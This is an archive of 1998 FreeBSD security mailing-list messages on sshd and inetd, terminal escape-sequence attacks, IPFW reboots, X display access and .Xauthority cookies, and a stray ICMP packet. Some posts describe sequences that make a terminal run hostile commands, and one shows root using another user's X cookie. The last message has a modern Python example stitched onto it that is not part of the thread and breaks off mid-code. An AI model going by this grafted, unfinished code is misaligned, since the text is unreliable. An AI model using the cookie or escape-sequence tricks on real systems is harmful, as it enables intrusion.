From owner-freebsd-security Sun Sep 13 01:47:23 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA03976 for freebsd-security-outgoing; Sun, 13 Sep 1998 01:47:23 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id BAA03971 for ; Sun, 13 Sep 1998 01:47:20 -0700 (PDT) (envelope-from sthaug@nethelp.no)
From: sthaug@nethelp.no
Received: (qmail 20634 invoked by uid 1001); 13 Sep 1998 08:47:06 +0000 (GMT)
To: marquis@roble.com
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: sshd
In-Reply-To: Your message of "Sat, 12 Sep 1998 19:59:58 -0700 (PDT)"
References:
X-Mailer: Mew version 1.05+ on Emacs 19.34.2
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Date: Sun, 13 Sep 1998 10:47:06 +0200
Message-ID: <20632.905676426@verdi.nethelp.no>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> If you're running inetd then it doesn't seem consistent to start
> daemons that don't need to run all the time from startup scripts.
> Inetd was designed to conserve memory. If you have it why not use it?
> /etc/inetd.conf is also a common place to implement access control (via
> tcp_wrappers).

But I *do* need sshd all the time :-) Starting it from inetd might make
sense if this is a host you log in to very rarely.

> Other than that I've frequently run into situations where keepalives
> had to be turned off. In those cases ssh sessions invariably die and
> their daemons have to be killed-off by hand (kill ). As it is
> difficult to tell the original daemon from the child daemons it's also
> easy to accidentally kill the parent.

Not really. "cat /var/run/sshd.pid" tells you the pid of the parent.
Steinar Haug, Nethelp consulting, sthaug@nethelp.no

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun Sep 13 02:37:46 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id CAA07628 for freebsd-security-outgoing; Sun, 13 Sep 1998 02:37:46 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from tim.xenologics.com (tim.xenologics.com [194.77.5.24]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id CAA07621 for ; Sun, 13 Sep 1998 02:37:42 -0700 (PDT) (envelope-from seggers@semyam.dinoco.de)
Received: (from uucp@localhost) by tim.xenologics.com (8.8.5/8.8.8) with UUCP id LAA01582; Sun, 13 Sep 1998 11:36:43 +0200 (MET DST)
Received: from semyam.dinoco.de (semyam.dinoco.de [127.0.0.1]) by semyam.dinoco.de (8.9.1/8.8.8) with ESMTP id LAA02989; Sun, 13 Sep 1998 11:32:40 +0200 (CEST) (envelope-from seggers@semyam.dinoco.de)
Message-Id: <199809130932.LAA02989@semyam.dinoco.de>
To: andrew@squiz.co.nz
cc: Jay Tribick , freebsd-security@FreeBSD.ORG, seggers@semyam.dinoco.de
Subject: Re: Err.. cat exploit.. (!)
In-reply-to: Your message of "Fri, 11 Sep 1998 07:39:59 +1200."
Date: Sun, 13 Sep 1998 11:32:39 +0200
From: Stefan Eggers
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> about xterm escape sequences and so forth, but scanning through the
> man page for xterm, the 'string' action stands out as potentially highly
> dangerous unless care has been taken to limit its impact.

As I understand it these actions are meant for use in X resources to
bind keys to certain actions. So if one makes sure that the resources
are only loaded with user specified ones (as Xsession - which is used
by xdm - seems to do if one doesn't have an ~/.xsession) and the X
server disallows all accesses to other users only oneself can have set
these. Or do I misunderstand something here?

Stefan.
-- 
Stefan Eggers                          Lu4 yao2 zhi1 ma3 li4,
Max-Slevogt-Str. 1                     ri4 jiu3 jian4 ren2 xin1.
51109 Koeln
Federal Republic of Germany

From owner-freebsd-security Sun Sep 13 03:46:03 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id DAA14961 for freebsd-security-outgoing; Sun, 13 Sep 1998 03:46:03 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from hotmail.com (f35.hotmail.com [207.82.250.46]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id DAA14944 for ; Sun, 13 Sep 1998 03:44:56 -0700 (PDT) (envelope-from madrapour@hotmail.com)
Received: (qmail 16469 invoked by uid 0); 13 Sep 1998 10:44:29 -0000
Message-ID: <19980913104429.16468.qmail@hotmail.com>
Received: from 208.218.169.84 by www.hotmail.com with HTTP; Sun, 13 Sep 1998 03:44:28 PDT
X-Originating-IP: [208.218.169.84]
From: "N. N.M"
To: freebsd-security@FreeBSD.ORG
Subject: A question probably relevant to IPFW
Content-Type: text/plain
Date: Sun, 13 Sep 1998 03:44:28 PDT
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi,

I was wondering if somebody could help me. I had a FreeBSD with IPFW
active on it to filter some kinds of packets. It was rebooted
automatically and frequently every 2 or 3 days at 2 am. I've removed
IPFW from it and also set up another FreeBSD (with the same
configuration) as the active filter. Now the new computer does the same:
it's rebooted automatically and frequently every 2-3 days at 2 am. But the
former computer hasn't been rebooted after removing IPFW from it and
since the time it wasn't the active filter.

Please let me know if anybody has any idea about it.

Thanks.
N.M

______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com

From owner-freebsd-security Sun Sep 13 03:57:44 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id DAA16461 for freebsd-security-outgoing; Sun, 13 Sep 1998 03:57:44 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from gratis.grondar.za (gratis.grondar.za [196.7.18.65]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id DAA16452 for ; Sun, 13 Sep 1998 03:57:38 -0700 (PDT) (envelope-from mark@grondar.za)
Received: from grondar.za (localhost [127.0.0.1]) by gratis.grondar.za (8.9.1/8.9.1) with ESMTP id MAA15702; Sun, 13 Sep 1998 12:56:21 +0200 (SAST) (envelope-from mark@grondar.za)
Message-Id: <199809131056.MAA15702@gratis.grondar.za>
To: Stefan Eggers
cc: andrew@squiz.co.nz, Jay Tribick , freebsd-security@FreeBSD.ORG
Subject: Re: Err.. cat exploit.. (!)
In-Reply-To: Your message of " Sun, 13 Sep 1998 11:32:39 +0200."
    <199809130932.LAA02989@semyam.dinoco.de>
References: <199809130932.LAA02989@semyam.dinoco.de>
Date: Sun, 13 Sep 1998 12:56:16 +0200
From: Mark Murray
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Stefan Eggers wrote:
> As I understand it these actions are meant for use in X resources to
> bind keys to certain actions. So if one makes sure that the resources
> are only loaded with user specified ones (as Xsession - which is used
> by xdm - seems to do if one doesn't have an ~/.xsession) and the X
> server disallows all accesses to other users only oneself can have set
> these. Or do I misunderstand something here?

You misunderstand the terminal model. _MOST_ modern terminals have the
ability to allow an escape-sequence to modify either the "report-back"
string, any keystroke, or certain keystrokes to send an (attacker-chosen)
string. Clever attackers have used this in the past to get the terminal
to send hostile commands back to the host system.

X server is not involved in the _general_ model, nor is the OS.

Can we put this to sleep now?

M
-- 
Mark Murray
Join the anti-SPAM movement: http://www.cauce.org

From owner-freebsd-security Sun Sep 13 05:37:43 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id FAA27107 for freebsd-security-outgoing; Sun, 13 Sep 1998 05:37:43 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from tim.xenologics.com (tim.xenologics.com [194.77.5.24]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id FAA27101 for ; Sun, 13 Sep 1998 05:37:39 -0700 (PDT) (envelope-from seggers@semyam.dinoco.de)
Received: (from uucp@localhost) by tim.xenologics.com (8.8.5/8.8.8) with UUCP id OAA16716; Sun, 13 Sep 1998 14:36:34 +0200 (MET DST)
Received: from semyam.dinoco.de (semyam.dinoco.de [127.0.0.1]) by semyam.dinoco.de (8.9.1/8.8.8) with ESMTP id OAA12240; Sun, 13 Sep 1998 14:34:00 +0200 (CEST) (envelope-from seggers@semyam.dinoco.de)
Message-Id: <199809131234.OAA12240@semyam.dinoco.de>
To: Mark Murray
Cc: freebsd-security@FreeBSD.ORG, seggers@semyam.dinoco.de
Subject: Re: Err.. cat exploit.. (!)
In-reply-to: Your message of "Sun, 13 Sep 1998 12:56:16 +0200." <199809131056.MAA15702@gratis.grondar.za>
Date: Sun, 13 Sep 1998 14:33:58 +0200
From: Stefan Eggers
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> > As I understand it these actions are meant for use in X resources to

> You misunderstand the terminal model.

No, it was specifically about xterm's action string() as was visible by
reading the text I quoted. My intention was to explain why this specific
thing isn't harmful if used properly, i.e. only oneself has access to the
X server when logged in.

> Can we put this to sleep now?

For a generic terminal it was at sleep for me already as I know about the
problem for at least a decade. I just didn't see anybody saying a word
about xterm's action string() and as I know that these things can
sometimes be hard to understand I just wanted to give some help for those
trying.

Stefan.
-- 
Stefan Eggers                          Lu4 yao2 zhi1 ma3 li4,
Max-Slevogt-Str. 1                     ri4 jiu3 jian4 ren2 xin1.
51109 Koeln
Federal Republic of Germany

From owner-freebsd-security Sun Sep 13 06:06:52 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id GAA00952 for freebsd-security-outgoing; Sun, 13 Sep 1998 06:06:52 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from ifi.uio.no (ifi.uio.no [129.240.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id GAA00944 for ; Sun, 13 Sep 1998 06:06:50 -0700 (PDT) (envelope-from dag-erli@ifi.uio.no)
Received: from gjallarhorn.ifi.uio.no (2602@gjallarhorn.ifi.uio.no [129.240.65.40]) by ifi.uio.no (8.8.8/8.8.7/ifi0.2) with ESMTP id PAA15929; Sun, 13 Sep 1998 15:06:35 +0200 (MET DST)
Received: (from dag-erli@localhost) by gjallarhorn.ifi.uio.no ; Sun, 13 Sep 1998 15:06:34 +0200 (MET DST)
Mime-Version: 1.0
To: "N.
N.M"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: A question probably relevant to IPFW
References: <19980913104429.16468.qmail@hotmail.com>
Organization: University of Oslo, Department of Informatics
X-url: http://www.stud.ifi.uio.no/~dag-erli/
X-other-addresses: 'finger dag-erli@ifi.uio.no' for a list
X-disclaimer-1: The views expressed in this article are mine alone, and do
X-disclaimer-2: not necessarily coincide with those of any organisation or
X-disclaimer-3: company with which I am or have been affiliated.
X-Stop-Spam: http://www.cauce.org/
From: dag-erli@ifi.uio.no (Dag-Erling Coïdan Smørgrav)
Date: 13 Sep 1998 15:06:34 +0200
In-Reply-To: "N. N.M"'s message of "Sun, 13 Sep 1998 03:44:28 PDT"
Message-ID:
Lines: 19
X-Mailer: Gnus v5.5/Emacs 19.34
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by hub.freebsd.org id GAA00947
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

"N. N.M" writes:
> I was wondering if somebody could help me. I had a FreeBSD with IPFW
> active on it to filter some kinds of packets. It was rebooted
> automatically and frequently every 2 or 3 days at 2 am. I've removed
> IPFW from it and also set up another FreeBSD (with the same
> configuration) as the active filter. Now the new computer does the same:
> it's rebooted automatically and frequently every 2-3 days at 2 am. But the
> former computer hasn't been rebooted after removing IPFW from it and
> since the time it wasn't the active filter.

Sounds to me like something in /etc/daily crashes your box, since it
always happens at 2 am. Anyway, this is not the right list, unless you
suspect the reboots are caused by malicious tampering; you should post
your question to freebsd-stable or freebsd-current, depending on which
version you run.
DES
-- 
Dag-Erling Smørgrav - dag-erli@ifi.uio.no

From owner-freebsd-security Sun Sep 13 09:16:14 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA15781 for freebsd-security-outgoing; Sun, 13 Sep 1998 09:16:14 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from passer.osg.gov.bc.ca (passer.osg.gov.bc.ca [142.32.110.29]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA15772 for ; Sun, 13 Sep 1998 09:16:13 -0700 (PDT) (envelope-from cy@cschuber.net.gov.bc.ca)
Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.8.8/8.6.10) id JAA05216; Sun, 13 Sep 1998 09:15:55 -0700 (PDT)
Received: from cschuber.net.gov.bc.ca(142.31.240.113), claiming to be "cwsys.cwsent.com" via SMTP by passer.osg.gov.bc.ca, id smtpdlX5211; Sun Sep 13 09:15:18 1998
Received: (from uucp@localhost) by cwsys.cwsent.com (8.8.8/8.6.10) id JAA03746; Sun, 13 Sep 1998 09:15:02 -0700 (PDT)
Message-Id: <199809131615.JAA03746@cwsys.cwsent.com>
Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdNc3732; Sun Sep 13 09:14:57 1998
X-Mailer: exmh version 2.0.2 2/24/98
Reply-to: Cy Schubert - ITSD Open Systems Group
From: Cy Schubert - ITSD Open Systems Group
X-Sender: cy
To: Karl Denninger
cc: Garrett Wollman , Josef Karthauser , Jay Tribick , freebsd-security@FreeBSD.ORG, cschuber@uumail.gov.bc.ca
Subject: X Security (was: Re: Err.. cat exploit.. (!))
In-reply-to: Your message of "Thu, 10 Sep 1998 13:36:15 CDT." <19980910133615.A13227@Mcs.Net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Sun, 13 Sep 1998 09:14:53 -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> On Thu, Sep 10, 1998 at 12:22:09PM -0400, Garrett Wollman wrote:
> > < said:
> >
> > >> That's why you should normally use `more' or `less'.
> >
> > > Ok, but how come the interactions we describe?
> >
> > Most terminals, including the VT102 emulated by `xterm', include some
> > mechanism for generating an ``answerback'' upon receipt of a special
> > control code or sequence. (In xterm's case, that happens to be a
> > control-E.) A binary file is likely enough to contain such a code.
> >
> > There might be a preference you can set which will disable this
> > feature in xterm, but I don't know what it might be (and if there is
> > one, it's not documented).
> >
> > -GAWollman
>
> Actually, for VTxxx series terminals (and good emulators of them) as well as
> most others, the problem is far worse.
>
> Most terminals can be made to display something, set the cursor to where the
> "something" is, and then *send the line containing the something to the
> host*.
>
> This allows ARBITRARY commands to be accidentally (read: maliciously)
> executed by someone doing nothing more than displaying a file!
>
> This is an OLD trick, but one which still works, and if the person doing the
> tricking is crafty it can be particularly dangerous. (Consider that most
> terminals also have attributes such as "invisible" text available, and/or
> that you can send the line, then back up again and overwrite it).
>
> I can craft a 40-50 byte sequence that will, if the file is "catted" as
> root, give me an instant SUID root shell somewhere on the system that
> you're very unlikely to find.
>
> Indiscriminately displaying files without terminal control enforced (ie: by
> a pager) is EXTREMELY dangerous, especially if you're running with
> privileges (ie: as root).

That is why doing an xhost + or even an xhost hostname, even to hosts
that you think you trust, is so dangerous. It is easy for someone to
inject some "keystrokes" into an Xterm to get a root shell on a host
that one is logged into.

Regards,                       Phone:  (250)387-8437
Cy Schubert                    Fax:    (250)387-5766
Open Systems Group             Internet:  cschuber@uumail.gov.bc.ca
ITSD                                      Cy.Schubert@gems8.gov.bc.ca
Government of BC

From owner-freebsd-security Sun Sep 13 10:17:19 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA21338 for freebsd-security-outgoing; Sun, 13 Sep 1998 10:17:19 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from phluffy.lm.com (phluffy.lm.com [204.171.44.47]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA21333 for ; Sun, 13 Sep 1998 10:17:17 -0700 (PDT) (envelope-from myke@ees.com)
Received: from localhost (myke@localhost) by phluffy.lm.com (8.9.0/8.8.8) with ESMTP id NAA27678; Sun, 13 Sep 1998 13:16:44 -0400 (EDT) (envelope-from myke@ees.com)
Date: Sun, 13 Sep 1998 13:16:43 -0400 (EDT)
From: Mike Holling
X-Sender: myke@phluffy.lm.com
To: sthaug@nethelp.no
cc: marquis@roble.com, freebsd-security@FreeBSD.ORG
Subject: Re: sshd
In-Reply-To: <20632.905676426@verdi.nethelp.no>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> > If you're running inetd then it doesn't seem consistent to start
> > daemons that don't need to run all the time from startup scripts.
> > Inetd was designed to conserve memory. If you have it why not use it?
> > /etc/inetd.conf is also a common place to implement access control (via
> > tcp_wrappers).

Inetd runs many things, and on some of the (older) machines here inetd
occasionally dies. It's very nice to have ssh run standalone so you can
still get into the machine remotely and restart inetd.

- Mike

From owner-freebsd-security Sun Sep 13 14:20:20 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA04141 for freebsd-security-outgoing; Sun, 13 Sep 1998 14:20:20 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from alecto.physics.uiuc.edu (alecto.physics.uiuc.edu [130.126.8.20]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA04135 for ; Sun, 13 Sep 1998 14:20:17 -0700 (PDT) (envelope-from igor@alecto.physics.uiuc.edu)
Received: (from igor@localhost) by alecto.physics.uiuc.edu (8.9.0/8.9.0) id QAA15620; Sun, 13 Sep 1998 16:19:55 -0500 (CDT)
Date: Sun, 13 Sep 1998 16:19:55 -0500 (CDT)
From: Igor Roshchin
Message-Id: <199809132119.QAA15620@alecto.physics.uiuc.edu>
To: security@FreeBSD.ORG
Subject: X-security
Cc: cschuber@uumail.gov.bc.ca
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

>
> That is why doing an xhost + or even an xhost hostname, even to hosts
> that you think you trust, is so dangerous. It is easy for someone to
> inject some "keystrokes" into an Xterm to get a root shell on a host
> that one is logged into.
>
>
> Regards,                       Phone:  (250)387-8437
> Cy Schubert                    Fax:    (250)387-5766
> Open Systems Group             Internet:  cschuber@uumail.gov.bc.ca
> ITSD                                      Cy.Schubert@gems8.gov.bc.ca
> Government of BC
>

Maybe I am wrong, but xterm (when correctly configured, e.g.: no
emulation enabled) will not allow one to do that.
Am I blindly wrong?

The much higher danger in having xhost set to allow outside, or even
inside connections - possibility of "stealing" your keystrokes.

AFAIK, XFree86 does allow one to disable access to your DISPLAY
even from the localhost by other users
(E.g. on SGIs one can always run any program with DISPLAY set local to
localhost:0, and you cannot disable that).

Regards,

IgoR

From owner-freebsd-security Sun Sep 13 18:52:33 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA07062 for freebsd-security-outgoing; Sun, 13 Sep 1998 18:52:33 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from trooper.velocet.ca (host-034.canadiantire.ca [209.146.201.34]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA07055; Sun, 13 Sep 1998 18:52:31 -0700 (PDT) (envelope-from dgilbert@trooper.velocet.ca)
Received: (from dgilbert@localhost) by trooper.velocet.ca (8.8.7/8.8.7) id VAA28566; Sun, 13 Sep 1998 21:52:10 -0400 (EDT)
Date: Sun, 13 Sep 1998 21:52:10 -0400 (EDT)
Message-Id: <199809140152.VAA28566@trooper.velocet.ca>
From: David Gilbert
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
To: John Fieber
Cc: Roger Marquis , freebsd-security@FreeBSD.ORG, ports@FreeBSD.ORG
Subject: Re: sshd
In-Reply-To:
References:
X-Mailer: VM 6.34 under Emacs 20.2.1
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

>>>>> "John" == John Fieber writes:

John> [topic drift from security to ports; CC: added] On Sat, 12 Sep
John> 1998, Roger Marquis wrote:

John> A more frustrating problem for me are ports that are not
John> ${PREFIX} != /usr/local compatible which makes it a hassle to
John> install multiple versions of a port or separate ports that have
John> common files. Also, I occasionally go through phases of liking
John> SysV way of installing things in /opt/,
John> /etc/opt/ and /var/opt/ which a simple 'make
John> PREFIX=/opt/' doesn't really accomplish.

The NetBSD ports collection seems happy to consistently use /usr/pkg as
its root. I'm certainly not positive that this can easily be made a
changeable option without some difficulty, but one of the often heard
complaints in our shop is that we can't really use /usr/local for local
things anymore because ports live there --- and we desire the ability to
blow away easily recreated ports while retaining hand built extras.

Dave.

-- 
============================================================================
|David Gilbert, Velocet Communications.       | Two things can only be     |
|Mail:       dgilbert@velocet.net             |  equal if and only if they |
|http://www.velocet.net/~dgilbert             |   are precisely opposite.  
|
=========================================================GLO================

From owner-freebsd-security Sun Sep 13 20:08:25 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA14016 for freebsd-security-outgoing; Sun, 13 Sep 1998 20:08:25 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from obie.softweyr.com ([204.68.178.33]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA14008 for ; Sun, 13 Sep 1998 20:08:22 -0700 (PDT) (envelope-from wes@softweyr.com)
Received: from softweyr.com (wes@zaphod.softweyr.com [204.68.178.35]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id VAA14791; Sun, 13 Sep 1998 21:07:59 -0600 (MDT) (envelope-from wes@softweyr.com)
Message-ID: <35FC888F.89EF324C@softweyr.com>
Date: Sun, 13 Sep 1998 21:07:59 -0600
From: Wes Peters
Organization: Softweyr llc
X-Mailer: Mozilla 4.05 [en] (X11; I; FreeBSD 2.2.6-RELEASE i386)
MIME-Version: 1.0
To: Igor Roshchin
CC: security@FreeBSD.ORG
Subject: Re: X-security
References: <199809132119.QAA15620@alecto.physics.uiuc.edu>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Igor Roshchin wrote:
>
> AFAIK, XFree86 does allow one to disable access to your DISPLAY
> even from the localhost by other users
> (E.g. on SGIs one can always run any program with DISPLAY set local to
> localhost:0, and you cannot disable that).

You're right. By default, XFree86 uses "MIT MAGIC COOKIE" authentication;
when the server starts it creates a .Xauthority file in your home
directory. Anyone who can read this file will still be able to connect
to your X server -- the root account on your machine, for instance.
Try it on your system: log in as root and try xdpyinfo; it will fail
saying

  # export DISPLAY=:0
  # xdpyinfo
  Xlib: connection to ":0.0" refused by server
  Xlib: Client is not authorized to connect to Server
  xdpyinfo: unable to open display ":0".

Now try it again, specifying YOUR Xauthority file:

  # export XAUTHORITY=~wes/.Xauthority
  # xdpyinfo
  name of display:    :0.0
  version number:    11.0
  vendor string:    The XFree86 Project, Inc
  vendor release number:    3320
  maximum request size:  4194300 bytes
  ...

I use this at work, where I am typically logged onto one or more large
server machines from my workstation. My .profile on the server machines
copies over my current .Xauthority file whenever I login, allowing me
access to the workstation display.

-- 
"Where am I, and what am I doing in this handbasket?"
Wes Peters                                                Softweyr LLC
http://www.softweyr.com/~softweyr                         wes@softweyr.com

From owner-freebsd-security Sun Sep 13 20:57:52 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA17704 for freebsd-security-outgoing; Sun, 13 Sep 1998 20:57:52 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from aniwa.sky (pppk-28.igrin.co.nz [202.49.245.107]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA17698 for ; Sun, 13 Sep 1998 20:57:48 -0700 (PDT) (envelope-from andrew@squiz.co.nz)
Received: from localhost (andrew@localhost) by aniwa.sky (8.8.7/8.8.7) with SMTP id PAA01640 for ; Mon, 14 Sep 1998 15:57:30 +1200 (NZST) (envelope-from andrew@squiz.co.nz)
Date: Mon, 14 Sep 1998 15:57:29 +1200 (NZST)
From: Andrew McNaughton
X-Sender: andrew@aniwa.sky
Reply-To: andrew@squiz.co.nz
To: security@FreeBSD.ORG
Subject: odd icmp packet
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I monitor odd packets on broadcast channels, and this turned up in my
logs:

  Sep 14 14:57:55 dawn /kernel: ipfw: 60100 Accept ICMP:11.0 xxx.xx.xx.xx 255.255.255.255 in via de0

xxx.xx.xx.xx is not on my subnet, but the machine which recorded this is
not behind a firewall except in so far as it runs its own filters.

ICMP:11.0 indicates time exceeded in transit.

Can someone explain what might have caused this? Am I correct in
thinking that because ICMP packets do not generate responses this does
not have DoS relevance?

Andrew McNaughton

From owner-freebsd-security Sun Sep 13 21:50:09 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id VAA23302 for freebsd-security-outgoing; Sun, 13 Sep 1998 21:50:09 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from alcanet.com.au (border.alcanet.com.au [203.62.196.10]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id VAA23295 for ; Sun,
 13 Sep 1998 21:50:04 -0700 (PDT) (envelope-from peter.jeremy@auss2.alcatel.com.au)
Received: by border.alcanet.com.au id <40329>; Mon, 14 Sep 1998 14:49:16 +1000
Date: Mon, 14 Sep 1998 14:49:35 +1000
From: Peter Jeremy
Subject: Re: X-security
To: freebsd-security@FreeBSD.ORG
Message-Id: <98Sep14.144916est.40329@border.alcanet.com.au>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Wes Peters wrote:
> By default, XFree86 uses "MIT MAGIC COOKIE" authen-
>tication; when the server starts it creates a .Xauthority file in
>your home directory. Anyone who can read this file will still be
>able to connect to your X server

Note that the authentication tokens are not encrypted on the network.
Anyone who can sniff the network will also be able to connect to your
X-server. If you're worried about someone stealing your authentication
token, you'll need to use something like XDM-AUTHORIZATION-1 (*),
SUN-DES-1 (**) or ssh.

> # export XAUTHORITY=~wes/.Xauthority
> # xdpyinfo

I find this very useful for running X-sessions after I su.

(*) XDM-AUTHORIZATION-1 uses DES and is not compiled into the standard
version of XFree. Suitable versions of WrapHelp.c are available from
outside the US for people wanting to use it.

(**) I don't believe this is supported by anyone except Sun.
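Worked example for the two points above (Wes: whoever can read .Xauthority owns the display; Peter: MIT-MAGIC-COOKIE-1 goes over the wire in clear). This is an added illustration, not code from either message: it parses the Xau(3) file format, checks the file's mode and owner, and builds the X11 connection-setup request a client sends first, showing the cookie sitting verbatim inside it. The sample entries, hostname, address and cookie are made up for the example.

```python
"""Added example (not code from the thread): what .Xauthority holds, why its
file mode matters, and why an MIT-MAGIC-COOKIE-1 token can be sniffed.

The Xau(3) file format and the X11 connection-setup layout are the documented
ones; the sample entries, cookie and address below are constructed here."""
import os
import stat
import struct
from typing import List, NamedTuple

FAMILY_INTERNET = 0     # IPv4 address
FAMILY_LOCAL = 256      # local (unix-socket) display, address = hostname


class XauthEntry(NamedTuple):
    family: int
    address: bytes
    number: bytes   # display number, as ASCII
    name: bytes     # e.g. b"MIT-MAGIC-COOKIE-1"
    data: bytes     # the 16-byte cookie


def _counted(buf: bytes, off: int):
    """u16 big-endian length, then that many bytes."""
    (n,) = struct.unpack_from(">H", buf, off)
    return buf[off + 2:off + 2 + n], off + 2 + n


def parse_xauthority(buf: bytes) -> List[XauthEntry]:
    """Parse the Xau(3) on-disk format: family (u16 BE) followed by four
    length-prefixed fields: address, display number, auth name, auth data."""
    entries, off = [], 0
    while off < len(buf):
        (family,) = struct.unpack_from(">H", buf, off)
        address, off = _counted(buf, off + 2)
        number, off = _counted(buf, off)
        name, off = _counted(buf, off)
        data, off = _counted(buf, off)
        entries.append(XauthEntry(family, address, number, name, data))
    return entries


def encode_entry(e: XauthEntry) -> bytes:
    """Inverse of parse_xauthority; used here to build the sample file."""
    out = struct.pack(">H", e.family)
    for field in (e.address, e.number, e.name, e.data):
        out += struct.pack(">H", len(field)) + field
    return out


def x11_setup_request(auth_name: bytes, auth_data: bytes) -> bytes:
    """First bytes a client sends on a new X connection (little-endian form):
    byte order, pad, protocol 11.0, name/data lengths, pad, then name and data
    each padded to 4.  The cookie travels in clear: a sniffer on a TCP display
    reads it straight out of this packet."""
    def pad4(b: bytes) -> bytes:
        return b + b"\0" * (-len(b) % 4)
    hdr = struct.pack("<cxHHHHxx", b"l", 11, 0, len(auth_name), len(auth_data))
    return hdr + pad4(auth_name) + pad4(auth_data)


def xauthority_problems(path: str) -> List[str]:
    """Why someone other than the owner could read the cookie from this file
    (root can always read it, whatever the mode says)."""
    st = os.stat(path)
    mode = stat.S_IMODE(st.st_mode)
    problems = []
    if mode & 0o077:
        problems.append("mode %04o lets group/other read the cookie" % mode)
    if st.st_uid != os.getuid():
        problems.append("owned by uid %d, not the current user" % st.st_uid)
    return problems


# Constructed sample: one local display and one TCP display, same cookie.
SAMPLE_COOKIE = bytes.fromhex("0123456789abcdef0123456789abcdef")
SAMPLE_XAUTHORITY = (
    encode_entry(XauthEntry(FAMILY_LOCAL, b"zaphod", b"0",
                            b"MIT-MAGIC-COOKIE-1", SAMPLE_COOKIE))
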